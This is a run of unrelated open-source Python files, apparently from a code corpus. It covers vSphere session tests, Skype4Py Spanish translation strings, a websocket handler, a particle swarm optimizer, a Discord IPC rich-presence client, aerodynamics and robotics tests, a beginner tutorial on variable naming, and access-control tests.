vim_session.ConnectionHandler.create_session = False vm_session = vim_session.ConnectionHandler.create_connection() self.assertEqual(vim_session.ConnectionHandler.host_ip, self.host_ip) self.assertEqual(vim_session.ConnectionHandler.host_username, self.host_username) self.assertEqual(vim_session.ConnectionHandler.host_password, self.host_password) self.assertEqual(vim_session.ConnectionHandler.api_retry_count, 2) self.assertEqual(vim_session.ConnectionHandler.wsdl_url, self.wsdl_url) self.assertTrue(vm_session) def test_connection_handler_stop(self): vim_session.ConnectionHandler.set_vc_details(self.host_ip, self.host_username, self.host_password, self.api_retry_count, self.wsdl_url, self.ca_cert, self.connection_timeout) vim_session.ConnectionHandler.create_session = False vim_session.ConnectionHandler.create_connection() with mock.patch.object(api.VMwareAPISession, "logout") as log_ob: vim_session.ConnectionHandler.stop() self.assertTrue(log_ob.called) 
self.assertTrue(vim_session.ConnectionHandler.stopped) def test_connection_handler_start(self): vim_session.ConnectionHandler.start() self.assertFalse(vim_session.ConnectionHandler.stopped) def test_get_connection(self): vim_session.ConnectionHandler.set_vc_details(self.host_ip, self.host_username, self.host_password, self.api_retry_count, self.wsdl_url, self.ca_cert, self.connection_timeout) vim_session.ConnectionHandler.create_session = False vm_session = vim_session.ConnectionHandler.create_connection() new_session = vim_session.ConnectionHandler.get_connection() self.assertEqual(vm_session, new_session) <filename>Skype4Py/lang/es.py<gh_stars>100-1000 apiAttachAvailable = u'API disponible' apiAttachNotAvailable = u'No disponible' apiAttachPendingAuthorization = u'Autorizaci\xf3n pendiente' apiAttachRefused = u'Rechazado' apiAttachSuccess = u'Conectado' apiAttachUnknown = u'Desconocido' budDeletedFriend = u'Borrado de la lista de contactos' budFriend = u'Contacto' budNeverBeenFriend = u'Nunca estuvo en la lista de contactos' budPendingAuthorization = u'Autorizaci\xf3n pendiente' budUnknown = u'Desconocido' cfrBlockedByRecipient = u'Llamada bloqueada por el destinatario' cfrMiscError = u'Error de car\xe1cter general' cfrNoCommonCodec = u'Ning\xfan c\xf3dec com\xfan' cfrNoProxyFound = u'No se encontr\xf3 proxy' cfrNotAuthorizedByRecipient = u'El usuario actual no est\xe1 autorizado por el destinatario' cfrRecipientNotFriend = u'El destinatario no es un contacto' cfrRemoteDeviceError = u'Existe un problema con el dispositivo de sonido remoto' cfrSessionTerminated = u'Sesi\xf3n terminada' cfrSoundIOError = u'Error de E/S de sonido' cfrSoundRecordingError = u'Error de grabaci\xf3n de sonido' cfrUnknown = u'Desconocido' cfrUserDoesNotExist = u'El usuario o el n\xfamero telef\xf3nico no existen' cfrUserIsOffline = u'Est\xe1 desconectado/a' chsAllCalls = u'Di\xe1logos heredados' chsDialog = u'Di\xe1logo' chsIncomingCalls = u'Esperando aceptaci\xf3n grupal' chsLegacyDialog = u'Di\xe1logos heredados' chsMissedCalls = u'Di\xe1logo' chsMultiNeedAccept = u'Esperando aceptaci\xf3n grupal' chsMultiSubscribed = u'Grupal suscrita' chsOutgoingCalls = u'Grupal suscrita' chsUnknown = u'Desconocido' chsUnsubscribed = u'No suscrito' clsBusy = u'Ocupado' clsCancelled = u'Cancelado' clsEarlyMedia = u'Reproduciendo medios iniciales (Early Media)' clsFailed = u'Perd\xf3n, llamada fallida!' 
clsFinished = u'Finalizada' clsInProgress = u'Llamada en curso' clsLocalHold = u'En espera local' clsMissed = u'Llamada perdida' clsOnHold = u'En espera' clsRefused = u'Rechazado' clsRemoteHold = u'En espera remota' clsRinging = u'helistanud' clsRouting = u'Enrutando' clsTransferred = u'Desconocido' clsTransferring = u'Desconocido' clsUnknown = u'Desconocido' clsUnplaced = u'Nunca se realiz\xf3' clsVoicemailBufferingGreeting = u'Almacenando saludo en el b\xfafer' clsVoicemailCancelled = u'Mensaje de voz cancelado' clsVoicemailFailed = u'Fallo del buz\xf3n del voz' clsVoicemailPlayingGreeting = u'Reproduciendo saludo' clsVoicemailRecording = u'Grabando mensaje de voz' clsVoicemailSent = u'Mensaje de voz enviado' clsVoicemailUploading = u'Cargando mensaje de voz' cltIncomingP2P = u'Llamada recibida de par a par' cltIncomingPSTN = u'Llamada recibida' cltOutgoingP2P = u'Llamada realizada de par a par' cltOutgoingPSTN = u'Llamada realizada' cltUnknown = u'Desconocido' cmeAddedMembers = u'Miembros agregados' cmeCreatedChatWith = u'Conversaci\xf3n iniciada con' cmeEmoted = u'Desconocido' cmeLeft = u'Conversaci\xf3n abandonada' cmeSaid = u'Dijo' cmeSawMembers = u'Mi<NAME>' cmeSetTopic = u'Definici\xf3n del tema' cmeUnknown = u'Desconocido' cmsRead = u'Le\xeddo' cmsReceived = u'Recibido' cmsSending = u'Enviando...' cmsSent = u'Enviado' cmsUnknown = u'Desconocido' conConnecting = u'Conectando' conOffline = u'Desconectado' conOnline = u'Conectado' conPausing = u'En pausa' conUnknown = u'Desconocido' cusAway = u'Ausente' cusDoNotDisturb = u'Ocupado' cusInvisible = u'Invisible' cusLoggedOut = u'Desconectado' cusNotAvailable = u'No disponible' cusOffline = u'Desconectado' cusOnline = u'Conectado' cusSkypeMe = u'Skyp\xe9ame' cusUnknown = u'Desconocido' cvsBothEnabled = u'Enviando y recibiendo video' cvsNone = u'Sin video' cvsReceiveEnabled = u'Recibiendo video' cvsSendEnabled = u'Enviando video' cvsUnknown = u'' grpAllFriends = u'Todos los contactos' grpAllUsers = u'Todos los usuarios' grpCustomGroup = u'Personalizado' grpOnlineFriends = u'Contactos conectados' grpPendingAuthorizationFriends = u'Autorizaci\xf3n pendiente' grpProposedSharedGroup = u'Proposed Shared Group' grpRecentlyContactedUsers = u'Usuarios contactados recientemente' grpSharedGroup = u'Shared Group' grpSkypeFriends = u'Contactos de Skype' grpSkypeOutFriends = u'Contactos de SkypeOut' grpUngroupedFriends = u'Contactos no agrupados' grpUnknown = u'Desconocido' grpUsersAuthorizedByMe = u'Autorizado por m\xed' grpUsersBlockedByMe = u'Bloqueado por m\xed' grpUsersWaitingMyAuthorization = u'Esperando mi autorizaci\xf3n' leaAddDeclined = u'Agregado rechazado' leaAddedNotAuthorized = u'La persona agregada deber estar autorizada' leaAdderNotFriend = u'Quien agrega debe ser un contacto' leaUnknown = u'Desconocido' leaUnsubscribe = u'No suscrito' leaUserIncapable = u'Usuario inhabilitado' leaUserNotFound = u'No se encontr\xf3 el usuario' olsAway = u'Ausente' olsDoNotDisturb = u'Ocupado' olsNotAvailable = u'No disponible' olsOffline = u'Desconectado' olsOnline = u'Conectado' olsSkypeMe = u'Skyp\xe9ame' olsSkypeOut = u'SkypeOut' olsUnknown = u'Desconocido' smsMessageStatusComposing = u'Composing' smsMessageStatusDelivered = u'Delivered' smsMessageStatusFailed = u'Failed' smsMessageStatusRead = u'Read' smsMessageStatusReceived = u'Received' smsMessageStatusSendingToServer = u'Sending to Server' smsMessageStatusSentToServer = u'Sent to Server' smsMessageStatusSomeTargetsFailed = u'Some Targets Failed' smsMessageStatusUnknown = u'Unknown' 
smsMessageTypeCCRequest = u'Confirmation Code Request' smsMessageTypeCCSubmit = u'Confirmation Code Submit' smsMessageTypeIncoming = u'Incoming' smsMessageTypeOutgoing = u'Outgoing' smsMessageTypeUnknown = u'Unknown' smsTargetStatusAcceptable = u'Acceptable' smsTargetStatusAnalyzing = u'Analyzing' smsTargetStatusDeliveryFailed = u'Delivery Failed' smsTargetStatusDeliveryPending = u'Delivery Pending' smsTargetStatusDeliverySuccessful = u'Delivery Successful' smsTargetStatusNotRoutable = u'Not Routable' smsTargetStatusUndefined = u'Undefined' smsTargetStatusUnknown = u'Unknown' usexFemale = u'Mujer' usexMale = u'Hombre' usexUnknown = u'Desconocido' vmrConnectError = u'Error de conexi\xf3n' vmrFileReadError = u'Error de lectura en archivo' vmrFileWriteError = u'Error de escritura en archivo' vmrMiscError = u'Error de car\xe1cter general' vmrNoError = u'No se produjo error' vmrNoPrivilege = u'Sin privilegio de mensaje de voz' vmrNoVoicemail = u'Sin mensaje de voz' vmrPlaybackError = u'Error de reproducci\xf3n' vmrRecordingError = u'Error de grabaci\xf3n' vmrUnknown = u'Desconocido' vmsBlank = u'En blanco' vmsBuffering = u'Almacenando' vmsDeleting = u'Borrando' vmsDownloading = u'Descargando' vmsFailed = u'No enviado' vmsNotDownloaded = u'No se descarg\xf3' vmsPlayed = u'Reproducido' vmsPlaying = u'Reproduciendo' vmsRecorded = u'Grabado' vmsRecording = u'Grabando mensaje de voz' vmsUnknown = u'Desconocido' vmsUnplayed = u'No se reprodujo' vmsUploaded = u'Cargado' vmsUploading = u'Cargando' vmtCustomGreeting = u'Saludo personalizado' vmtDefaultGreeting = u'Saludo predeterminado' vmtIncoming = u'correo de voz entrante' vmtOutgoing = u'Saliente' vmtUnknown = u'Desconocido' vssAvailable = u'Disponible' vssNotAvailable = u'No disponible' vssPaused = u'Interrumpida' vssRejected = u'Rechazada' vssRunning = u'En curso' vssStarting = u'Iniciando' vssStopping = u'Detenida' vssUnknown = u'Desconocido' """Websocket subscriber handler functions.""" from typing import List from starlette.websockets import WebSocket from notify_server.clients.queue_entry import QueueEntry from notify_server.clients.subscriber import Subscriber, create from robot_server.settings import get_settings async def handle_socket( websocket: WebSocket, topics: List[str]) -> None: """Handle a websocket connection.""" subscriber = create( get_settings().notification_server_subscriber_address, topics ) await route_events(websocket, subscriber) async def send(websocket: WebSocket, queue_entry: QueueEntry) -> None: """Send queue entry to web socket.""" await websocket.send_text(queue_entry.json()) async def route_events(websocket: WebSocket, subscriber: Subscriber) -> None: """Route events from subscriber to websocket.""" async for queue_entry in subscriber: await send(websocket, queue_entry) <filename>pso_numpy.py import numpy as np # This is a PSO(interia weight) variation... class Particle: """ Particle class represents a solution inside a pool(Swarm). """ def __init__(self, no_dim, x_range, v_range): """ Particle class constructor :param no_dim: int No of dimensions. :param x_range: tuple(double) Min and Max value(range) of dimension. :param v_range: tuple(double) Min and Max value(range) of velocity. """ self.x = np.random.uniform( x_range[0], x_range[1], (no_dim,) ) # particle position in each dimension... self.v = np.random.uniform( v_range[0], v_range[1], (no_dim,) ) # particle velocity in each dimension... self.pbest = np.inf self.pbestpos = np.zeros((no_dim,)) class Swarm: """ Swarm class represents a pool of solution(particle). 
""" def __init__(self, no_particle, no_dim, x_range, v_range, iw_range, c): """ Swarm class constructor. :param no_particle: int No of particles(solutions). :param no_dim: int No of dimensions. :param x_range: tuple(double) Min and Max value(range) of dimension. :param v_range: tuple(double) Min and Max value(range) of velocity. :param iw_range: tuple(double) Min and Max value(range) of interia weight. :param c: tuple(double) c[0] -> cognitive parameter, c[1] -> social parameter. """ self.p = np.array( [Particle(no_dim, x_range, v_range) for i in range(no_particle)] ) self.gbest = np.inf self.gbestpos = np.zeros((no_dim,)) self.x_range = x_range self.v_range = v_range self.iw_range = iw_range self.c0 = c[0] self.c1 = c[1] self.no_dim = no_dim def optimize(self, function, X, Y, print_step, iter): """ optimize is used start optimization. :param function: function Function to be optimized. :param X: input Used in forward pass. :param Y: target Used to calculate loss. :param print_step: int Print pause between two adjacent prints. :param iter: int No of iterations. """ for i in range(iter): for particle in self.p: fitness = function(X, Y, particle.x) if fitness < particle.pbest: particle.pbest = fitness particle.pbestpos = particle.x.copy() if fitness < self.gbest: self.gbest = fitness self.gbestpos = particle.x.copy() for particle in self.p: # Here iw is inertia weight... iw = np.random.uniform(self.iw_range[0], self.iw_range[1], 1)[0] particle.v = ( iw * particle.v + ( self.c0 * np.random.uniform(0.0, 1.0, (self.no_dim,)) * (particle.pbestpos - particle.x) ) + ( self.c1 * np.random.uniform(0.0, 1.0, (self.no_dim,)) * (self.gbestpos - particle.x) ) ) # particle.v = particle.v.clip(min=self.v_range[0], max=self.v_range[1]) particle.x = particle.x + particle.v # particle.x = particle.x.clip(min=self.x_range[0], max=self.x_range[1]) if i % print_step == 0: print("iteration#: ", i + 1, " loss: ", fitness) print("global best loss: ", self.gbest) def get_best_solution(self): """ :return: array of parameters/weights. """ return self.gbestpos <reponame>luizffgv/discordrp-mpris # References: # * https://github.com/discordapp/discord-rpc/tree/master/documentation/hard-mode.md # * https://github.com/discordapp/discord-rpc/tree/master/src # * https://discordapp.com/developers/docs/rich-presence/how-to#updating-presence-update-presence-payload-fields # * https://github.com/devsnek/discord-rpc/tree/master/src/transports/IPC.js # * https://github.com/devsnek/discord-rpc/tree/master/example/main.js from abc import ABCMeta, abstractmethod import asyncio from functools import wraps import json import logging import os import sys import struct from typing import cast, Any, Dict, Generator, Tuple import uuid OP_HANDSHAKE = 0 OP_FRAME = 1 OP_CLOSE = 2 OP_PING = 3 OP_PONG = 4 JSON = Dict[str, Any] Reply = Tuple[int, JSON] logger = logging.getLogger(__name__) # Commonly thrown exceptions when connection is lost. # Must be a tuple to be used in `except`. exceptions = (ConnectionResetError, BrokenPipeError, asyncio.IncompleteReadError) class DiscordRpcError(Exception): pass class AsyncDiscordRpc(metaclass=ABCMeta): """Work with an open Discord instance via its JSON IPC for its rich presence. In a blocking way. Classmethod `for_platform` will resolve to UnixAsyncDiscordIpc. Windows hasn't been implemented. Supports asynchronous context handler protocol. 
""" def __init__(self, client_id: str, *, loop: asyncio.AbstractEventLoop = None) -> None: self.client_id = client_id self.loop = loop @property @abstractmethod def connected(self): pass async def connect(self): await self._connect() await self._do_handshake() # logger.debug("connected via ID %s", self.client_id) @classmethod def for_platform(cls, client_id: str, platform=sys.platform, *, loop: asyncio.AbstractEventLoop = None, ) -> 'AsyncDiscordRpc': if platform == 'win32': return NotImplemented # async is a pain for windows pipes else: return UnixAsyncDiscordRpc(client_id) @abstractmethod async def _connect(self) -> None: pass async def _do_handshake(self) -> None: while True: ret_op, ret_data = await self.send_recv({'v': 1, 'client_id': self.client_id}, op=OP_HANDSHAKE) # {'cmd': 'DISPATCH', 'data': {'v': 1, 'config': {...}}, 'evt': 'READY', 'nonce': None} if ret_op == OP_FRAME and ret_data['cmd'] == 'DISPATCH' and ret_data['evt'] == 'READY': return else: # No idea when or why this occurs; just try again. if ret_data == {'message': "Cannot read property 'id' of undefined"}: await asyncio.sleep(0.3) continue if ret_op == OP_CLOSE: await self.close() raise RuntimeError(ret_data) @abstractmethod async def _write(self, date: bytes): pass @abstractmethod async def _recv(self, size: int) -> bytes: pass async def _recv_header(self) -> Tuple[int, int]: header = await self._recv_exactly(8) return cast(Tuple[int, int], struct.unpack("<II", header)) async def _recv_exactly(self, size: int) -> bytes: buf = b"" size_remaining = size while size_remaining: chunk = await self._recv(size_remaining) chunk_size = len(chunk) if chunk_size == 0: raise EOFError() buf += chunk size_remaining -= chunk_size return buf async def close(self) -> None: if not self.connected: return logger.warning("closing connection") try: await self.send({}, op=OP_CLOSE) finally: await self._close() @abstractmethod async def _close(self) -> None: pass async def __aenter__(self) -> 'AsyncDiscordRpc': return self async def __aexit__(self, *_) -> None: if self.connected: await self.close() async def send_recv(self, data: JSON, *, op=OP_FRAME) -> Reply: nonce = data.get('nonce') await self.send(data, op=op) while True: reply = await self.recv() if reply[1].get('nonce') == nonce: return reply else: logger.warning("received unexpected reply; %s", reply) async def send(self, data: JSON, *, op=OP_FRAME) -> None: logger.debug("sending %s", data) data_str = json.dumps(data, separators=(',', ':')) data_bytes = data_str.encode('utf-8') header = struct.pack("<II", op, len(data_bytes)) await self._write(header) await self._write(data_bytes) async def recv(self) -> Reply: """Receives a packet from discord. Returns op code and payload. 
""" op, length = await self._recv_header() payload = await self._recv_exactly(length) data = json.loads(payload.decode('utf-8')) logger.debug("received %s", data) return op, data async def set_activity(self, act: JSON) -> Reply: data = { 'cmd': 'SET_ACTIVITY', 'args': {'pid': os.getpid(), 'activity': act}, 'nonce': str(uuid.uuid4()) } return await self.send_recv(data) async def clear_activity(self) -> Reply: data = { 'cmd': 'SET_ACTIVITY', 'args': {'pid': os.getpid()}, 'nonce': str(uuid.uuid4()) } return await self.send_recv(data) def _disconnect_on_error(func): @wraps(func) def wrapper(unix_rpc, *args, **kwargs): try: return func(unix_rpc, *args, **kwargs) except exceptions: unix_rpc.reader.feed_eof() raise return wrapper class UnixAsyncDiscordRpc(AsyncDiscordRpc): reader = None writer = None @property def connected(self): return self.reader and not self.reader.at_eof() async def _connect(self) -> None: for path in self._iter_path_candidates(): if not os.path.exists(path): logger.debug("%r not found", path) continue logger.debug("Attempting to connecting to %r", path) try: self.reader, self.writer = \ await asyncio.open_unix_connection(path, loop=self.loop) except OSError as e: logger.error("failed to open {!r}: {}".format(path, e)) else: break else: raise DiscordRpcError("Failed to connect to a Discord pipe") @staticmethod def _iter_path_candidates() -> Generator[str, None, None]: env_keys = ('XDG_RUNTIME_DIR', 'TMPDIR', 'TMP', 'TEMP') for env_key in env_keys: base_path = os.environ.get(env_key) if base_path and base_path.endswith('snap.sublime-text'): base_path = base_path[:-17] if base_path: break else: base_path = "/tmp" sub_path_candidates = ("snap.discord", "app/com.discordapp.Discord", "") for sub_path in sub_path_candidates: dir_path = os.path.join(base_path, sub_path) if os.path.exists(dir_path): for i in range(10): yield os.path.join(dir_path, "discord-ipc-{}".format(i)) @_disconnect_on_error async def _write(self, data: bytes) -> None: self.writer.write(data) # await self.writer.drain() # exception will be caught in _recv_exactly @_disconnect_on_error async def _recv(self, size: int) -> bytes: return await self.reader.read(size) @_disconnect_on_error async def _recv_exactly(self, size: int) -> bytes: return await self.reader.readexactly(size) async def _close(self) -> None: self.reader.feed_eof() self.writer.write_eof() await self.writer.drain() # sears_haack.py # # Created: Feb 2021, <NAME> # Modified: # ---------------------------------------------------------------------- # Imports # ---------------------------------------------------------------------- import SUAVE from SUAVE.Core import Units from SUAVE.Core import Data import numpy as np import pylab as plt import copy, time import random from SUAVE.Attributes.Gases.Air import Air import sys #import vehicle file sys.path.append('../Vehicles') from Concorde import vehicle_setup, configs_setup def main(): # initialize the vehicle vehicle = vehicle_setup() # initalize the aero model aerodynamics = SUAVE.Analyses.Aerodynamics.Supersonic_Zero() aerodynamics.geometry = vehicle aerodynamics.settings.drag_coefficient_increment = 0.0000 aerodynamics.settings.span_efficiency = 0.95 aerodynamics.settings.wave_drag_type = 'Sears-Haack' aerodynamics.settings.volume_wave_drag_scaling = 2.3 # calibrated to Concorde results aerodynamics.initialize() #no of test points test_num = 3 #specify the angle of attack angle_of_attacks = np.linspace(-.0174,.0174*3,test_num)[:,None] #* Units.deg # Cruise conditions (except Mach number) state = 
SUAVE.Analyses.Mission.Segments.Conditions.State() state.conditions = SUAVE.Analyses.Mission.Segments.Conditions.Aerodynamics() state.expand_rows(test_num) # -------------------------------------------------------------------- # Initialize variables needed for CL and CD calculations # Use a pre-run random order for values # -------------------------------------------------------------------- Mc = np.array([[1.03 ], [1.5 ], [2.0]]) rho = np.array([[0.16], [0.16], [0.16]]) mu = np.array([[1.42e-05], [1.42e-05], [1.42e-05]]) T = np.array([[217.], [217.], [217.]]) pressure = np.array([[ 10000.], [ 10000.], [ 10000.]]) re = np.array([[6.0e6], [6.0e6], [6.0e6]]) air = Air() a = air.compute_speed_of_sound(T,pressure) re = rho*a*Mc/mu state.conditions.freestream.mach_number = Mc state.conditions.freestream.density = rho state.conditions.freestream.dynamic_viscosity = mu state.conditions.freestream.temperature = T state.conditions.freestream.pressure = pressure state.conditions.freestream.reynolds_number = re state.conditions.aerodynamics.angle_of_attack = angle_of_attacks # -------------------------------------------------------------------- # Surrogate # -------------------------------------------------------------------- #call the aero model results = aerodynamics.evaluate(state) #build a polar for the markup aero polar = Data() CL = results.lift.total CD = results.drag.total polar.lift = CL polar.drag = CD # load older results #save_results(polar) old_polar = load_results() # check the results check_results(polar,old_polar) return def load_results(): return SUAVE.Input_Output.SUAVE.load('sears_haack_results.res') def save_results(results): SUAVE.Input_Output.SUAVE.archive(results,'sears_haack_results.res') return def check_results(new_results,old_results): # check segment values check_list = [ 'lift', 'drag', ] # do the check for k in check_list: print(k) old_val = np.max( old_results.deep_get(k) ) new_val = np.max( new_results.deep_get(k) ) err = (new_val-old_val)/old_val print('Error at Max:' , err) assert np.abs(err) < 1e-6 , 'Max Check Failed : %s' % k old_val = np.min( old_results.deep_get(k) ) new_val = np.min( new_results.deep_get(k) ) err = (new_val-old_val)/old_val print('Error at Min:' , err) assert np.abs(err) < 1e-6 , 'Min Check Failed : %s' % k print('') return if __name__ == '__main__': main()"""Test LfD specific constructors for Actions.""" # Copyright (c) 2022, ABB # All rights reserved. # # Redistribution and use in source and binary forms, with # or without modification, are permitted provided that # the following conditions are met: # # * Redistributions of source code must retain the # above copyright notice, this list of conditions # and the following disclaimer. # * Redistributions in binary form must reproduce the # above copyright notice, this list of conditions # and the following disclaimer in the documentation # and/or other materials provided with the # distribution. # * Neither the name of ABB nor the names of its # contributors may be used to endorse or promote # products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF # THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from bt_learning.learning_from_demo.demonstration import Action, EquivalentAction import numpy as np import quaternion class ActionTest(EquivalentAction): def __init__(self, actions): super().__init__(actions) def preconditions(self): pass def postconditions(self): pass def action_string(self): pass class ObservedActionTest(Action): def __init__(self): super().__init__('test_action', 'test_frame') self.n_targets = 2 # Poisition measurement noise standard deviation pos_stddev = 0.1 # Rotation measurement noise standard deviation rot_stddev = 0.1 # Targets at (0, 0, 0) and (1, 2, 3) with noise self.__targets = np.array([[0, 0, 0], [1, 2, 3]]) + pos_stddev*np.random.randn(2, 3) # First target is aligned with the frame rotation_vector1 = np.array([0, 0, 0]) # The second target is rotated 90 degrees around the y-axis with measurement # noise on the angle rotation_vector2 = np.array([0, 1, 0])*(np.pi/2 + rot_stddev*np.random.randn(1)) self.__target_orientations = quaternion.from_rotation_vector( np.stack([rotation_vector1, rotation_vector2])) def target_position(self, frame, i): """Define target at (0, 0, 0) and (1, 2, 3) with noise.""" return self.__targets[i] def target_orientation(self, frame, i): return self.__target_orientations[i] def test_combining_actions(): """Test means of the actions when building an EquivalentAction.""" # Create multiple instances of the same action with noise actions = [] for i in range(1000): # Many observations to reduce variance and random test failures actions.append(ObservedActionTest()) action = ActionTest(actions) # Actions should be summarized into two targets assert np.shape(action.targets) == (2, 3) assert np.shape(action.max_distance) == (2,) assert np.shape(action.target_orientations) == (2,) # Target positions close to (0, 0, 0) and (1, 2, 3) assert np.allclose(action.targets, np.array([[0, 0, 0], [1, 2, 3]]), rtol=0, atol=0.01) # Test orientations. Note that two quaternions q1 and q2 represent the same rotation # if either q1 == q2 or -q1 == q2. target_orientations = quaternion.from_rotation_vector(np.array([[0, 0, 0], [0, np.pi/2, 0]])) # Target orientation 1 close to being aligned assert quaternion.allclose( action.target_orientations[0], target_orientations[0], rtol=0, atol=0.06) or \ quaternion.allclose( -action.target_orientations[0], target_orientations[0], rtol=0, atol=0.06) # Target orientation 2 close to being aligned assert quaternion.allclose( action.target_orientations[1], target_orientations[1], rtol=0, atol=0.06) or \ quaternion.allclose( -action.target_orientations[1], target_orientations[1], rtol=0, atol=0.06) # nombres de variables anartz = "Mi nombre" # a = "Mi Nombre" <==== ¡¡¡ASI NO!!! food_today = "<NAME>" my_favourite_videogame = "<NAME>" # nombres de constantes EURO_PTS = 166.386 PI = 3.1415 SECONDS_PER_HOUR = 3600 # No podemos iniciar con un dígito # 0variable < ====== ¡¡¡ IMPOSIBLE !!! 
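# A small illustrative check (added example, not part of the original notes): Python itself
# can tell you whether a string would be a legal identifier.
import keyword

print("food_list".isidentifier())         # True: letters, digits and '_' only, does not start with a digit
print("0variable".isidentifier())         # False: starts with a digit
print("my-name-lastname".isidentifier())  # False: '-' is not allowed in names
print(keyword.iskeyword("class"))         # True: reserved words cannot be used as variable names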
""" Diferencia entre variables con el mismo nombre pero variando algun caracter de minúscula / mayúscula """ Anartz = "Otro valor" # En este caso se diferencia por el PRIMER CARACTER print(anartz) # "Mi nombre" print(Anartz) # "Otro valor" # Ejemplos válidos """ No puede empezar con números No símbolos especiales a-z, A-Z, 0-9 (no empieza), _ """ food_list = "Lista de la comida" my_name_lastname = "<NAME>" PI = 3.1415 SECONDS_MINUTE = 60 # Ejemplos NO válidos # 0_ <=== ESTO NO ES POSIBLE # my-name-lastname # my! # SECONDS.MINUTE = 60 # SECONDS!MINUTE = 60<filename>hs_access_control/tests/test_create_group_2.py from django.test import TestCase from django.contrib.auth.models import Group from hs_core import hydroshare from hs_core.testing import MockIRODSTestCaseMixin from hs_access_control.tests.utilities import global_reset class T15CreateGroup(MockIRODSTestCaseMixin, TestCase): "Test creatng a group" def setUp(self): super(T15CreateGroup, self).setUp() global_reset() self.group, _ = Group.objects.get_or_create(name='Resource Author') self.admin = hydroshare.create_account( '<EMAIL>', username='admin', first_name='administrator', last_name='couch', superuser=True, groups=[] ) self.cat = hydroshare.create_account( '<EMAIL>', username='cat', first_name='not a dog', last_name='last_name_cat', superuser=False, groups=[] ) self.dog = hydroshare.create_account( '<EMAIL>', username='dog', first_name='<NAME>', last_name='last_name_dog', superuser=False, groups=[] ) self.meowers = self.cat.uaccess.create_group( title='meowers', description='We are the meowers') def test_01_default_group_ownership(self): "Defaults for group ownership are correct" cat = self.cat meowers = self.meowers self.assertTrue(cat.uaccess.owns_group(meowers)) self.assertTrue(cat.uaccess.can_change_group(meowers)) self.assertTrue(cat.uaccess.can_view_group(meowers)) self.assertTrue(meowers.gaccess.public) self.assertTrue(meowers.gaccess.discoverable) self.assertTrue(meowers.gaccess.shareable) def test_02_default_group_isolation(self): "Users with no contact with the group have appropriate permissions" # start up as an unprivileged user with no access to the group dog = self.dog meowers = self.meowers self.assertFalse(dog.uaccess.owns_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertTrue(dog.uaccess.can_view_group(meowers)) self.assertTrue(meowers.gaccess.public) self.assertTrue(meowers.gaccess.discoverable) self.assertTrue(meowers.gaccess.shareable) def test_03_change_group_not_public(self): "Can make a group not public" dog = self.dog meowers = self.meowers self.assertFalse(dog.uaccess.owns_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertTrue(dog.uaccess.can_view_group(meowers)) # now set it to non-public meowers.gaccess.public = False meowers.gaccess.save() # check flags self.assertFalse(meowers.gaccess.public) self.assertTrue(meowers.gaccess.discoverable) self.assertTrue(meowers.gaccess.shareable) # test that an unprivileged user cannot read the group now self.assertFalse(dog.uaccess.owns_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertFalse(dog.uaccess.can_view_group(meowers)) # django admin can still have access to the private group self.assertFalse(self.admin.uaccess.owns_group(meowers)) self.assertTrue(self.admin.uaccess.can_change_group(meowers)) self.assertTrue(self.admin.uaccess.can_view_group(meowers)) def test_03_change_group_not_discoverable(self): "Can make a group not discoverable" dog = self.dog meowers = 
self.meowers self.assertFalse(dog.uaccess.owns_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertTrue(dog.uaccess.can_view_group(meowers)) # now set it to non-discoverable meowers.gaccess.discoverable = False meowers.gaccess.save() # check flags self.assertTrue(meowers.gaccess.public) self.assertFalse(meowers.gaccess.discoverable) self.assertTrue(meowers.gaccess.shareable) # public -> discoverable; test that an unprivileged user can read the # group now self.assertTrue(dog.uaccess.can_view_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertFalse(dog.uaccess.owns_group(meowers)) # django admin has access to not discoverable group self.assertTrue(self.admin.uaccess.can_view_group(meowers)) self.assertTrue(self.admin.uaccess.can_change_group(meowers)) self.assertFalse(self.admin.uaccess.owns_group(meowers)) <filename>examples/examplePlaybackBodyTracker.py<gh_stars>100-1000 import sys import cv2 sys.path.insert(1, '../') import pykinect_azure as pykinect if __name__ == "__main__": video_filename = "output.mkv" # Initialize the library, if the library is not found, add the library path as argument pykinect.initialize_libraries(track_body=True) # Start playback playback = pykinect.start_playback(video_filename) playback_config = playback.get_record_configuration() # print(playback_config) playback_calibration = playback.get_calibration() # Start body tracker bodyTracker = pykinect.start_body_tracker(calibration=playback_calibration) cv2.namedWindow('Depth image with skeleton',cv2.WINDOW_NORMAL) while playback.isOpened(): # Get camera capture capture = playback.update() # Get body tracker frame body_frame = bodyTracker.update(capture=capture) # Get the colored depth ret, depth_color_image = capture.get_colored_depth_image() # Get the colored body segmentation ret, body_image_color = body_frame.get_segmentation_image() if not ret: continue # Combine both images combined_image = cv2.addWeighted(depth_color_image, 0.6, body_image_color, 0.4, 0) # Draw the skeletons combined_image = body_frame.draw_bodies(combined_image) # Overlay body segmentation on depth image cv2.imshow('Depth image with skeleton',combined_image) # Press q key to stop if cv2.waitKey(1) == ord('q'): breakimport pytest def test_import(): import pyfortune <reponame>wenbobuaa/pykit import unittest from kazoo.client import KazooClient from pykit import utdocker from pykit import ututil from pykit import zkutil dd = ututil.dd zk_tag = 'daocloud.io/zookeeper:3.4.10' zk_name = 'zk_test' class ZKTestBase(unittest.TestCase): @classmethod def setUpClass(cls): utdocker.pull_image(zk_tag) def setUp(self): utdocker.create_network() 